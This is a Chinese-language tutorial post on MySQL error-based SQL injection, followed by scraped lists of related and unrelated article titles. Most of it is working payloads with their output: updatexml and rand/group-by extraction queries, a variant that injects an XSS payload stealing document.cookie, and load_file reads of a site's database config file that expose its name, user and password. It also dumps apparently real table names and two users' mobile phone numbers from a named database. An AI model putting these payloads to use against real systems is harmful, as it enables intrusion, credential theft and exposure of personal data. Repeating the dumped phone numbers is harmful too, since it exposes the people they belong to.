报错是如何转为xss的?

mysql语句在页面报错,泄露信息

=========================================================================================================================================================================

*	报错方式之“updatexml”,有字数限制,但无需配合union。

	-	mysql> select updatexml(1, concat(':', 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: ':test'

	-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);

			ERROR 1105 (HY000): XPATH syntax error: '^test'

	**	将上面‘test’换成你的子查询语句或函数均可。

*	group by+rand(0)+having,无字数限制,无需配合union。

	-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);

			ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*	报错方式之“rand+count+group by”,需配合union

	rand(0)无论在哪台机器运行多少次,生成的序列都是一样的

	参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'

	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

			ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'

	**	将上面‘test’换成你的子查询语句或函数均可。

mysql转xss语句

	mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'

直接爆配置文件密码,前提是有file权限

	mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'

	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);

		ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','

爆版本

	mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;

		ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

爆库名

	mysql> select info();

		ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist

	mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

爆表名

	mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

爆字段名

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'

	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

爆字段值

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'

	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;

		ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'

  

mysql基于“报错”的注入的更多相关文章

  1. sql注入--基于报错的注入

    这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学 ...

  2. 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记

    phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...

  3. MySQL基于报错注入2

    目标站点: 0x1 注入点判断 http://www.xxxxxx.com/pages/services.php?id=1 #true http://www.xxxxxx.com/pages/serv ...

  4. MySQL基于报错注入1

    0x1 判断注入点: http://www.xxxx.ro/s.php?id=1' 那么尝试闭合下单引号 http://www.xxxx.ro/s.php?id=1' --+ 0x2 枚举下表的列 h ...

  5. sqli-labs:1-4,基于报错的注入

    sqli1: 脚本 # -*- coding: utf-8 -*- """ Created on Sat Mar 23 09:37:14 2019 @author: ke ...

  6. Mysql报错型注入总结

    Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录.在常 ...

  7. python 3.5.2安装mysql驱动报错

    python 3.5.2安装mysql驱动报错 python 3.5.2安装mysql驱动时出现如下异常: [root@localhost www]# pip install mysql-connec ...

  8. Loadrunner参数化连接oracle、mysql数据源报错及解决办法

    Loadrunner参数化连接oracle.mysql数据源报错及解决办法 (本人系统是Win7 64,  两位小伙伴因为是默认安装lr,安装在 最终参数化的时候,出现连接字符串无法自动加载出来: 最 ...

  9. 连接mysql数据库报错java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized...解决方法

    今天连接mysql数据库报错如下: java.sql.SQLException: The server time zone value '�й���׼ʱ��' is unrecognized or r ...

随机推荐

  1. CentOS安装Apache-2.4.10+安全配置

    注:以下所有操作均在CentOS 6.5 x86_64位系统下完成. #准备工作# 在安装Nginx之前,请确保已经使用yum安装了各基础组件,并且配置了www用户和用户组,具体见<CentOS ...

  2. (哈夫曼树)HuffmanTree的java实现

    参考自:http://blog.csdn.net/jdhanhua/article/details/6621026 哈夫曼树 哈夫曼树(霍夫曼树)又称为最优树. 1.路径和路径长度在一棵树中,从一个结 ...

  3. OC中加载html5调用html方法和修改HTML5内容

    1.利用webView控件加载本地html5或者网络上html5 2.设置控制器为webView的代理,遵守协议 3.实现代理方法webViewDidFinishLoad: 4.在代理方法中进行操作H ...

  4. [LeetCode] Sum of Left Leaves 左子叶之和

    Find the sum of all left leaves in a given binary tree. Example: 3 / \ 9 20 / \ 15 7 There are two l ...

  5. ant windows环境配置

    详见如下链接,小蚂蚁builder.xml--apache-ant的配置 http://blog.csdn.net/gaohuanjie/article/details/40142687

  6. Android -- 获取网络数据并将数据存到本地数据库中

    public static final int downloadDone = 1; // 用户model数组 ArrayList<Loginer> loginers = new Array ...

  7. Servlet的生命周期

    Servlet的生命周期 Servlet的生命周期是由tomcat服务器来控制的. 1 构造方法: 创建servlet对象的时候调用.默认情况下,第一访问servlet就会创建servlet对象只创建 ...

  8. 用vue.js学习es6(五):set和map的使用

    一:Set用法: ES6提供了新的数据结构Set.它类似于数组,但是成员的值都是唯一的,没有重复的值. (1).打印:console.log var data = new Set([1,2,3]); ...

  9. ftp文件的部署

    之前在公司搭建了一个静态资源服务器,现在来记录一下 我们是通过搭建vsftp服务,然后结合apache.访问方式为http的方式 一:VSFTPD环境安装 首先我们就是要查看一下vsftpd是否有安装 ...

  10. 43. Multiply Strings

    /** * @param {string} num1 * @param {string} num2 * @return {string} */ var multiply = function(num1 ...